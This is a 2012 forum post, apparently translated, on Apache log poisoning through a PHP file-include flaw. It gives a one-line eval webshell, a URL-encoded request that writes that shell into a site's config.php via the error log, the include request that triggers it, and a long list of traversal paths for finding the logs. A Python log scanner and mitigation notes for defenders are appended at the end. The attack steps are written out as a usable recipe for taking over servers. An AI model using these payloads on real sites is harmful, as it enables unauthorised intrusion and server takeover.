PHP include of Apache logs to write a webshell

Posted on 2012-9-15 14:27:40
Because the method above is very impractical (in testing I found the log is routinely tens of megabytes, which makes it no fun to play with), the next step is to think a bit further: write a genuinely practical webshell to use, which is also far better than that painfully slow method above.

For example, still using this one-line shell:
<?eval($_POST[cmd]);?>
By now you have probably thought of it: this is a pretty good approach. Reading on, how to write it becomes the question. Use this statement: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then the one-line server-side shell statement <?eval($_POST[cmd]);?> is written into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   // writes the one-line shell statement into config.php
We submit this statement, let Apache record it in the error log, and then include the log; the shell is then written successfully. Remember that it must be converted to URL-encoded form, otherwise it will not work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
# k6 r# M  \! i& a: _0 O) ^* R3 H& q
This way the error log has recorded the line of code that writes the webshell.
Now we include the log, submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
The webshell is now written successfully; config.php contains the one-line shell statement.
OK.
http://www.xxx.com/forum/config.php has become our webshell.
Connect to it directly with lanker's client and the host is yours.
PS: Everything above assumes the directory permissions are writable; it must be -rwxrwxrwx (777) to proceed. Here I simply used the directory listed above to check. Everything above is exploitation in the case where the log path is already known.

For other log paths you can guess, or refer to the list here.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
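As an added example from the defender's side (this is not code from the original post), the following Python scans constructed Apache access-log lines for the two traces this technique leaves behind: a PHP open tag inside a logged request line (the poisoning step described above) and a request parameter that traverses to one of the log locations in the list just given. The client addresses, timestamps and the zizzy parameter name are constructed samples modelled on the post's own example; the directory hints and file names are taken from the path list and are an assumption about what a given server actually uses.

```python
"""Detect Apache log poisoning and log-file include probes in access-log lines.

Two indicators are checked on every request line:
  1. a PHP open tag ("<?") once the request is fully URL-decoded
  2. path traversal that ends at a known Apache log location
All log lines below are constructed samples; nothing is read from a live server.
"""
import re
from urllib.parse import unquote

# Common/combined log format prefix: client ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)

# Directory hints and file names assumed from the path list in the post
LOG_DIR_HINTS = ("/var/log/", "/etc/httpd/logs/", "/var/www/logs/",
                 "/usr/local/apache/logs/", "apache/logs/")
LOG_FILE_NAMES = ("access_log", "access.log", "acces_log", "acces.log",
                  "error_log", "error.log")
PHP_TAG_RE = re.compile(r"<\?")
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """URL-decode until the string stops changing (bounded), so a double-encoded
    %252e%252e%252f is recognised as ../ just like a single layer of encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str):
    """Split one access-log line into client, time, request target and status.
    Returns None for lines that do not match the format (never raises)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, request, status = m.group("client", "time", "request", "status")
    parts = request.split(" ")          # "GET /path HTTP/1.1" -> middle part is the target
    target = parts[1] if len(parts) >= 2 else request
    return {"client": client, "time": when, "target": target, "status": int(status)}


def classify(target: str) -> list:
    """Return the list of indicator names raised by one request target."""
    decoded = fully_decode(target)
    lowered = decoded.lower()
    findings = []
    if PHP_TAG_RE.search(decoded):
        findings.append("php-tag-in-request")
    if TRAVERSAL_RE.search(decoded):
        findings.append("path-traversal")
    if any(h in lowered for h in LOG_DIR_HINTS) and any(n in lowered for n in LOG_FILE_NAMES):
        findings.append("log-file-path-in-request")
    return findings


def scan(lines):
    """Return (client, decoded target, findings) for every line that raised a finding."""
    results = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify(rec["target"])
        if findings:
            results.append((rec["client"], fully_decode(rec["target"]), findings))
    return results


# Constructed sample log: one benign request, one poisoning attempt, two log-path
# probes (the second double-encoded), and one malformed line the parser must skip.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Sep/2012:14:27:40 +0800] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Sep/2012:14:28:01 +0800] "GET /%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 404 210',
    '203.0.113.9 - - [15/Sep/2012:14:28:05 +0800] "GET /z.php?zizzy=../../../../../../../../../../var/log/httpd/access_log HTTP/1.1" 200 80433',
    '203.0.113.9 - - [15/Sep/2012:14:28:09 +0800] "GET /z.php?zizzy=%252e%252e%252f%252e%252e%252fetc%252fhttpd%252flogs%252ferror_log HTTP/1.1" 200 1270',
    'not a log line at all',
]

if __name__ == "__main__":
    for client, target, findings in scan(SAMPLE_LOG):
        print(f"{client}  {', '.join(findings)}  {target}")
```

The access log keeps the request line as the client sent it, so the poisoning payload is still URL-encoded there and must be decoded before matching; decoding is repeated because a double-encoded payload only becomes readable on the second pass. The parser targets the access-log format only; error_log lines have a different layout and need their own regex. Beyond detection, the two conditions the post itself states as prerequisites are the mitigation points: the included path should never come from a request parameter, and the log directory should not be readable (let alone writable) by the user the PHP worker runs as.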